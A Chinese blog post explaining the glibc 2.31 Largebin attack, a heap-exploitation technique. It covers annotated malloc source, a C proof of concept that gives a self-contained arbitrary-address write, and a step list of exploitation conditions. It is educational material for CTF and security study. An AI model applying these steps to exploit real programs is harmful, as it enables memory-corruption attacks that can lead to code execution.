Largebin Attack原理详解

最新推荐文章于 2024-02-14 13:06:46 发布
最新推荐文章于 2024-02-14 13:06:46 发布
阅读量1.4k 收藏 3
点赞数 1
分类专栏: 总结 漏洞复现与分析 文章标签: 网络安全 链表
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/126211062
版权
本文详细解析了Linux Glibc内存管理中的Largebin攻击原理,通过代码分析展示了攻击过程。首先介绍了攻击所需的条件,即能够修改Largebin的bk_nextsize字段。然后逐步阐述了攻击步骤,包括内存分配、释放、修改指针等操作,最终实现对特定内存地址的写入。概念验证代码证明了攻击的有效性。总结了Largebin攻击的利用条件和步骤,强调了内存管理安全的重要性。
摘要由CSDN通过智能技术生成

0x0 简介

攻击成效:能够向任意地址写堆地址,常配合其他攻击手法实现 getshell

条件:能够修改 L a r g e b i n − > b k \textcolor{orange}{Largebin->bk} Largebin>bk

研究环境: G l i b c 2.31 \textcolor{green}{研究环境:Glibc2.31} 研究环境:Glibc2.31

0x1 原理

static void *
_int_malloc (mstate av, size_t bytes)
{
  ...
      if (!checked_request2size (bytes, &nb))
      {
          __set_errno (ENOMEM);
          return NULL;
      }    
  ...
      for (;; )
      {
          int iters = 0;
          // 如果unsortedbin不为空
          while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
          {
              // victim是当前unsortedbin中的第一个块
              bck = victim->bk;
              size = chunksize (victim);
              mchunkptr next = chunk_at_offset (victim, size);

              ...
                  /* victim从unsortedbin中摘除 */
                  if (__glibc_unlikely (bck->fd != victim))
                      malloc_printerr ("malloc(): corrupted unsorted chunks 3");
              unsorted_chunks (av)->bk = bck;
              bck->fd = unsorted_chunks (av);

              ...
                  /* place chunk in bin */
                  // 判断victim的大小是否属于smallbin
                  if (in_smallbin_range (size))
                  {
                      victim_index = smallbin_index (size);
                      bck = bin_at (av, victim_index);
                      fwd = bck->fd;
                  }
              else
              {
                  victim_index = largebin_index (size);
                  // bck是Largebin中的第一个chunk
                  bck = bin_at (av, victim_index);
                  //  在Largebin中只有一个块的时候,fwd指向的是Largebin链表头
                  fwd = bck->fd;

                  /* maintain large bins in sorted order */
                  // 如果largebin不为空,则维护largebin的顺序性(小到大)
                  if (fwd != bck)
                  {
                      /* Or with inuse bit to speed comparisons */
                      size |= PREV_INUSE;
                      /* if smaller than smallest, bypass loop below */
                      assert (chunk_main_arena (bck->bk));
                      /* 
                        chunksize_nomask(bck->bk)取得的是Largebinbin中第一个chunk的大小
					  size则是的unsortedbin中第一个chunk的大小
			  		*/
                      if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk))
                      {
                          fwd = bck;
                          bck = bck->bk;

                          victim->fd_nextsize = fwd->fd;
                          victim->bk_nextsize = fwd->fd->bk_nextsize;
                          fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
                      }
                      else
                      {
                          ...
                      }
                  }
                  else
                      // 将victim视作largebin中的块
                      victim->fd_nextsize = victim->bk_nextsize = victim;
              }
              // 将victim放入相应的bin链表中
              mark_bin (av, victim_index);
              victim->bk = bck;
              victim->fd = fwd;
              fwd->bk = victim;
              bck->fd = victim;
              ...
          }
}

以上代码片段是系统根据用户请求内存分配的大小对 unsortedbin 的操作,此时只要 Largebin不为空 @line:48,并且处于 unsortedbin中的块大小属于 Largebin的范畴同时还要小于 Largebin中的块大小,就会将 unsortedbin中的块链入Largebin 对应的链表中 @line:58@line:77并调整顺序。

注意: L a r g e b i n 是以 f d _ n e x t s i z e 和 b k _ n e x t s i z e 组织成双向链表的。 \textcolor{green}{注意:Largebin是以 fd\_nextsize 和 bk\_nextsize组织成双向链表的。} 注意:Largebin是以fd_nextsizebk_nextsize组织成双向链表的。

@line:60 开始就是关键操作,bckLargebin中的第一个块,记为 chunk1victimeunsortedbin中的第一个 块,记为 chunk2,假设攻击者之前已经修改成 c h u n k 1 − > b k _ n e x t s i z e = T a r g e t − 0 x 20 \textcolor{orange}{chunk1->bk\_nextsize=Target-0x20} chunk1>bk_nextsize=Target0x20,那么链入操作就变成了

fwd = chunk1;
bck = *(chunk1 + 0x18); // 在Largebin中只有一个块的时候,bck指向的是Largebin链表头
*(chunk2 + 0x20) = *(chunk1 + 0x10); // 在Largebin中只有一个块的时候,chunk2 + 0x20指向的是Largebin链表头
*(chunk2 + 0x28) = *(*(chunk1 + 0x10) + 0x28); // chunk2 + 0x28指向的是Target-0x20
*(*(chunk1 +0x10) + 0x28) =  *(*(chunk2 + 0x28) + 0x20) = chunk2; // <=> *(Target-0x20+0x20) = chunk2;

结果就是 Target指向的地址被写入了 chunk2的地址,这就是 Largebin attack的核心原理!

0x2 概念验证

为了直观的演示这个利用过程,我编写了如下概念验证的代码

#include<unistd.h>
#include<stdio.h>
#include<stdlib.h>

size_t g_Target = 0xABCDEF20220807;
int main()
{
    puts(" ========================================================================");
    puts("|                    Wellcome to the Largebin Attack                     |");
    puts(" ========================================================================");
    
    printf("\n[*] Info:\n");
    printf("[+] Target addr = %p, value: %lx\n",&g_Target,g_Target);

    char* large_chunk1 = (char*)malloc(0x450);
    char* pad1 = (char*)malloc(0x20);
    char* large_chunk2 = (char*)malloc(0x440);
    char* pad2 = (char*)malloc(0x20);

    printf(
        "[+] large_chunk1 addr = %p\n"
        "[+] pad1 addr = %p\n"
        "[+] large_chunk2 addr = %p\n"
        "[+] pad2 addr = %p\n",
        large_chunk1,
        pad1,
        large_chunk2,
        pad2);
    puts("--------------------------------------------------------------------------");
    puts("[*] Step1: Free large_chunk1 into largebin.\n");
    free(large_chunk1);
    char* pad3 = (char*)malloc(0x500);
    printf("[+] pad3 addr = %p",pad3);

    puts("--------------------------------------------------------------------------");
    puts("[*] Step2: Free large_chunk2 into unsortedbin.\n");
    free(large_chunk2);

    puts("--------------------------------------------------------------------------");
    puts("[*] Step3: Modify Largbin[0]->bk_nextsize = g_Target-0x20.\n");
    *(size_t*)(large_chunk1+0x18)=((size_t)&g_Target)-0x20;
    
    puts("--------------------------------------------------------------------------");
    puts("[*] Step4: Trigger largebin attack.\n");
    char* p1 = (char*)malloc(0x20);

    puts("--------------------------------------------------------------------------");
    printf("[*] Lookup: Target value = %lx\n",g_Target);

    return 0;
}

试着运行之后发现我们成功地完成了一次对 Target内存的Largebin attack!

在这里插入图片描述

0x3 总结

现在总结一下Largebin attack的一些利用条件和步骤。

【利用条件】:

  1. 能够修改 Largebin 中的块的 bk_nextsize 字段。
  2. 程序中至少能够分配三种属于 Largebin的不同大小的块。

【利用步骤】:

  1. 分配一块大小 size1Largebin 范围内的块 chunk1
  2. 分配一块任意大小的块 pad1,主要防止在释放 chunk1 时系统将其与 top chunk合并。
  3. 分配一块大小 size2 在 Largebin 范围内的块 chunk2,要求 s i z e 2 < s i z e 1 \textcolor{orange}{size2<size1} size2<size1
  4. 分配一块任意大小的块 pad2,主要防止在释放 chunk2 时系统将其与 top chunk合并
  5. 释放 chunk1,此时系统会将其放入 unsortedbin;再分配一个 size3 的块,要求 s i z e 3 > s i z e 1 \textcolor{orange}{size3>size1} size3>size1,此时系统就会将 chunk1 放进 Largebin中。
  6. 释放 chunk2进入 unsortedbin
  7. 修改 c h u n k 1 − > b k _ n e x t s i z e   =   T a r g e t   −   0 x 20 \textcolor{orange}{chunk1->bk\_nextsize\ =\ Target\ -\ 0x20} chunk1>bk_nextsize = Target  0x20
  8. 随意分配一个大小的块,就会触发Largebin attack。
飞鸿踏雪(蓝屏选手)
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
好好说话之Large Bin Attack
hollk’s blog
01-20 4648
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Large bin attack
abelxu
11-26 1881
0x01 large bin Large bins 中一共包括 63 个 bin,index为64~126,每个 bin 中的 chunk 的大小不一致,而是处于一定区间范围内。(本文讨论的代码和结构都是在glibc2.23 64位的情况) 1.largebin的一些结构 在largebin的处理过程中会用到fd_next和bk_nextsize来加快chunk的处理。 struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of
glibc-2.29 large bin attack 原理
qq_23066945的博客
11-14 1057
glibc-2.29 large bin attack 原理 原创: 星盟安全团队 星盟安全 该方法并非笔者发现,而是阅读 balsn 的 writeup 时分析而得到的,这里介绍一下这种攻击方法。 unsorted bin attack 在介绍新的攻击技术之前,先来缅怀一下 unsorted bin attack , 由于 glibc-2.29 新上的保护措施,使得 unsorted bin ...
large bin attack & house of strom
seaaseesa的博客
06-12 1156
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
PRO(2.31largebin attack)
qq_33590156的博客
12-04 2869
关于largebin pro版本给了修复chunk flag的函数,而且show和edit都只看flag,free还没清指针,可以各种UAF。 但是,add中只能申请large chunk,这导致UAF不能进行任意地址申请,而且版本是libc2.31。 所以我们能用的就只能是largebin attack了,首先利用原理是,在largebin的管理中,采用先进先出的原则(插队头,取队尾),而且会排序,队头大,到队尾依次变小, 四个指针: fd是从队头一直指向队尾,队尾的fd指向main_arena; bk则
Largebin_Attack知识理解(附赠堆分配释放过程回忆!)
a2590035252的博客
09-30 1131
朋友们好啊,我史混源行易太极门掌门人peiWhao。刚才有个朋友问我P老师发生甚么事了,我说怎么回事,给我发了几个网址,我一看!奥!原来是昨天,有一个年轻知识点,一个事largebin、、、、、、
EWSA Mask attack 字典设置详解.docx
02-14
EWSA Mask attack (软件自带)字典设置详解
TANK ATTACK声卡驱动
12-28
TANK ATTACK声卡驱动最新版ASIO驱动,支持某宝198的双通道吉他声卡,内含2.8.47和2.9.15两个版本,分别都有32bit和64bit版本,自己根据需要安装。2.8.47版本比较稳定一点,直接安装就好,不需要注册码。
Attack_Http.rar_http attack下载
09-14
通过分析和运行`Attack_Http.java`,我们可以学习如何识别和应对HTTP攻击,理解HTTP协议的工作原理,以及在Java中实现一个基本的HTTP服务器。这不仅有助于提高网络安全意识,也有助于提升编程技能。
shiro_attack-2.2.jar
12-17
shiro_attack-2.2.jar
好好说话之Fastbin Attack(3):Alloc to Stack
hollk’s blog
12-17 1362
真的是好久好久都没更新了。。。。最近换工作再加上考CISP-PTE认证耽误了很长一段时间,这段时间打算把CISP-PTE的一些考点总结出来,如果你是做渗透工作或者ctf的web手,这个认证其实并不难。再来说说这篇文章吧,Alloc to Stack这种利用技巧其实和前面两篇区别不大,只不过就是伪造的chunk放在了栈上。这篇文章不会很长,因为wiki上没有适配的例子,自己也没找到。如果有做过这种技巧的例子的师傅,欢迎评论区留言~wiki上2015 9447 CTF : Search Engine这道题我会在
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 3152
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
[阅读型]glibc-2.31中的tcache stashing unlink与large bin attack
easy_level1的博客
06-01 1587
文章目录前言题目的漏洞与功能tcache stashing unlinklarge bin attack有了上述方法,然后做什么 前言 有幸和校队一起参加21年5月的xctf-final。笔者爆肝连续战斗十小时,在与队友各种讨论下艰难做出了house of pig这一题。事后看出题人的wp,方法不尽相同但也是收获良多,特此记录。 笔者的这题解法是没有large bin attack的(知识盲区),利用tcache stashing unlink写global_max_fast完成house of hust,
从零开始学howtoheap:理解fastbins的​large_bin攻击
最新发布
weixin_44626085的博客
02-14 800
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。
CTF 用户态ptmalloc pwn总结(一)
weixin_41918450的博客
09-24 898
kernel pwn题不准备以总结的方式来写,准备每一道题一篇文章专门分析,有很多题网上都有不少解析,我只在github提供的脚本基础上进行复现和分析(因为能力不够,比赛时kernel pwn做不出,只能赛后复现了) 准备讲一下这三道题,关于强网杯的两道题其实是csaw2010的两道题进行了一些修改。最后会写一篇文章进行专门的总结,关于在这三道题复现过程中的问题以及一些利用技巧。 强网杯2018 ...
libc.2.29漏洞利用及原理
starssgo的博客
03-24 1507
博客地址 还是在csdn里访问方便点。 tcache poisoning 原理 在libc2.27中,由于对tcache缺少充分的检查,导致double frees横行,在libc2.29中对tcache添加了一些东西。 malloc.c->2904行 typedef struct tcache_entry { struct tcache_entry *next; /* This f...
【PWN】Unsorted binLarge binAttack
u014377094的博客
05-03 833
今天继续整理攻击方法,逆水行舟,不进则退。 Unsorted bin attackLarge bin attack两者我还是放在一起了,因为两者相近,都是通过修改bk(bk_nextsize)来实现对一块区域的修改,漏洞在于缺少*(bk)->fd的检测。 unsortedbin的利用点 /* remove from unsorted list */ if (__glibc_unlikely (bck->fd != victim))
【kernel exploit】CVE-2017-10661 链表漏洞与TOCTTOU——任意地址写
panhewu9919的博客
04-01 963
【kernel exploit】CVE-2017-10661 链表漏洞与TOCTTOU——任意地址写 影响版本:Linux 2.6.27~4.10.14 4.10.15已修补,通过syzkaller发现。 7.0分 测试版本:Linux-4.10.14 测试环境下载地址 编译选项: CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB $ wget https:/
profiled attack
04-27
A profiled attack is a type of cyber attack where the attacker uses information gathered about the target to tailor the attack specifically to that target. This information can include details about the target's system, network, or behavior, as well as personal information such as passwords or login credentials. By using this information, the attacker can increase the chances of a successful attack and reduce the time it takes to execute the attack. Profiled attacks can be more difficult to defend against than generalized attacks because they are specifically designed to exploit weaknesses in a particular system or network.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值